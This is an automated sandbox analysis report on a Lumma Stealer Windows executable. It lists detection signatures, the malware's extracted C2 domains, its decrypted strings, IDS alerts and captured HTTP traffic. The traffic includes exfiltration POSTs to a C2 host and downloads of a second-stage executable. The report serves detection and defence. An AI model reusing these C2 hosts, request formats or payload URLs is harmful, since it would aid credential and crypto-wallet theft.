
Windows Analysis Report
FBmz85HS0d.exe

Overview

General Information

Sample name: FBmz85HS0d.exe (renamed because original name is a hash value)
Original sample name: 30669d81a7fc7b2867ecc452ce55d1d9.exe
Analysis ID: 1579799
MD5: 30669d81a7fc7b2867ecc452ce55d1d9
SHA1: 56ca44ab9cc26864bf86a41f82431239baf994a8
SHA256: dad97310b0e1e3b946976f14c39d47bbb7140c31e79597abcd6159c2a4f02c32
Tags: exe, LummaStealer, user-abuse_ch

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • FBmz85HS0d.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\FBmz85HS0d.exe" MD5: 30669D81A7FC7B2867ECC452CE55D1D9)
    • WerFault.exe (PID: 4236 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7312 -s 1876 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["cuddlyready.xyz", "sendypaster.xyz", "greywe-snotty.cyou", "hosue-billowy.cyou", "supporse-comment.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "smash-boiling.cyou", "steppriflej.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: FBmz85HS0d.exe PID: 7312 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:23:29.389976+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49699 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:31.540071+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49700 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:34.252674+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:36.552506+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49703 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:38.917767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49709 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:41.665068+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49716 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:44.347063+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49723 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:49.240072+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49740 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:51.519479+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49746 | 185.166.143.50 | 443 | TCP
2024-12-23T09:23:54.015497+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49752 | 3.5.25.82 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:23:30.182312+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:32.310553+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.150.173 | 443 | TCP
2024-12-23T09:23:49.985216+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49740 | 172.67.150.173 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:23:30.182312+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 172.67.150.173 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:23:32.310553+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49700 | 172.67.150.173 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T09:23:42.427857+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49716 | 172.67.150.173 | 443 | TCP


                AV Detection

Source: FBmz85HS0d.exe | Avira: detected
Source: FBmz85HS0d.exe.7312.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["cuddlyready.xyz", "sendypaster.xyz", "greywe-snotty.cyou", "hosue-billowy.cyou", "supporse-comment.cyou", "pollution-raker.cyou", "ripe-blade.cyou", "smash-boiling.cyou", "steppriflej.xyz"], "Build id": "LOGS11--LiveTraffic"}
Source: FBmz85HS0d.exe | ReversingLabs: Detection: 60%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: FBmz85HS0d.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: pollution-raker.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: hosue-billowy.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: ripe-blade.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: smash-boiling.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: supporse-comment.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: greywe-snotty.cyou
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: steppriflej.xyz
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: sendypaster.xyz
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: cuddlyready.xyz
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: LOGS11--LiveTraffic
Source: FBmz85HS0d.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.150.173:443 -> 192.168.2.7:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 3.5.25.82:443 -> 192.168.2.7:49752 version: TLS 1.2
Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: number of queries: 1001

                Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49699 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49699 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49716 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49700 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49700 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49740 -> 172.67.150.173:443
Source: Malware configuration extractor | URLs: cuddlyready.xyz
Source: Malware configuration extractor | URLs: sendypaster.xyz
Source: Malware configuration extractor | URLs: greywe-snotty.cyou
Source: Malware configuration extractor | URLs: hosue-billowy.cyou
Source: Malware configuration extractor | URLs: supporse-comment.cyou
Source: Malware configuration extractor | URLs: pollution-raker.cyou
Source: Malware configuration extractor | URLs: ripe-blade.cyou
Source: Malware configuration extractor | URLs: smash-boiling.cyou
Source: Malware configuration extractor | URLs: steppriflej.xyz
Source: DNS query: cuddlyready.xyz
Source: Joe Sandbox View | IP Address: 172.67.150.173
Source: Joe Sandbox View | IP Address: 185.166.143.50
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49700 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49723 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49740 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49752 -> 3.5.25.82:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49699 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49701 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49709 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49703 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49716 -> 172.67.150.173:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49746 -> 185.166.143.50:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6QLOBSPXZT92PZ4HKW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12850
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=OIEL5BSFKMMBH6W
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15064
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=Z8U6FMPNN7YKQ3BQ
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 20395
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=6GN8K2WS2O3290JLU
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 1239
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=0Q7VO4LRXIG1C
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 552437
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 88
    Host: cuddlyready.xyz
Source: global traffic | HTTP traffic detected:
    GET /mynewworkspace123312/scnd/downloads/FormattingCharitable.exe HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bitbucket.org
Source: global traffic | HTTP traffic detected:
    GET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHZYI6IXY&Signature=J4b5F46nqJdxKu%2F94UHON1kWKIg%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIEz4aJUGTT3%2F3aj0Sn7nYMfMQonpUyZRFJuL3VakDRucAiEAnHq8hEynshgipHPMX9ETdpZ7Hf7Do5GY23eCDhjjhnUqsAII0f%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDGwYdeefJ7qByxmhkCqEAqZU4UyGCH%2FIwXiBlHEfohy46PnGMfQ7E1PpYAz39S7FGTmhuKzqUff78ACf4GMbiYrBmT9RuUzkS6Gch8a8ELqELgAlkACrGlVQkUjMXlvV7tIEl9F8MrCQmEKAO3ZsuSp2OMS4u3XjM%2F%2FA%2Bm63uHeTE9TKYVc7oOdwav0mPwPXZEbECPwmrRfW%2FUxIHsvqiThPt%2F6Q4jqXHsqNzMwceDkXQHD0olNOLky3nAT%2BFCZYYRBYz8nsw9Z4W16CkLSZ2lFSLBPzD39jNyr6Luh%2Bbp2Im7TrxPYqVsuHTCv01wWV4InZ8Pmq6K1xnmPH%2FwhNJxLwji3W7h4wrFfB5Y%2FJPqqV3ryhMP61pLsGOp0B7rs44luHq97cxYmDLldQ21jEQyqEzNgQtLPiU7epXvR9H58p%2FhwRyUGLWDfqJtktXvdi4w2%2FLn0QPHILI%2F%2BgVTSv8F0qx4eoZGi5u1hVCaPz1DmiOUPdtDgGtwUYLI8ss7iCUu3%2F4DLuSnpjWWZnqTaXZoXzVQPV4Vlk6XlKlKT7S4pndYf6L%2FYGO35VtkeuLMX4lXVHOOtxovSF3Q%3D%3D&Expires=1734943238 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: bbuseruploads.s3.amazonaws.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: cuddlyready.xyz
Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: cuddlyready.xyz
Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exe
Source: FBmz85HS0d.exe, 00000000.00000002.1875057545.0000000001277000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1554154884.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.16/off/def.exentmj
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446155060.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482458559.0000000001260000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1446552557.0000000001254000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: FBmz85HS0d.exe, 00000000.00000003.1553814190.0000000005925000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553777662.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1557542576.00000000059A9000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000002.1877911381.0000000006039000.00000002.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1553935100.00000000058F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0A
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0C
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0X
Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: FBmz85HS0d.exe, 00000000.00000002.1875034913.0000000001263000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: FBmz85HS0d.exe, 00000000.00000002.1875080577.0000000001293000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1572945452.0000000001273000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: Amcache.hve.11.dr | String found in binary or memory: http://upx.sf.net
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: FBmz85HS0d.exe, 00000000.00000003.1378243759.000000000592B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
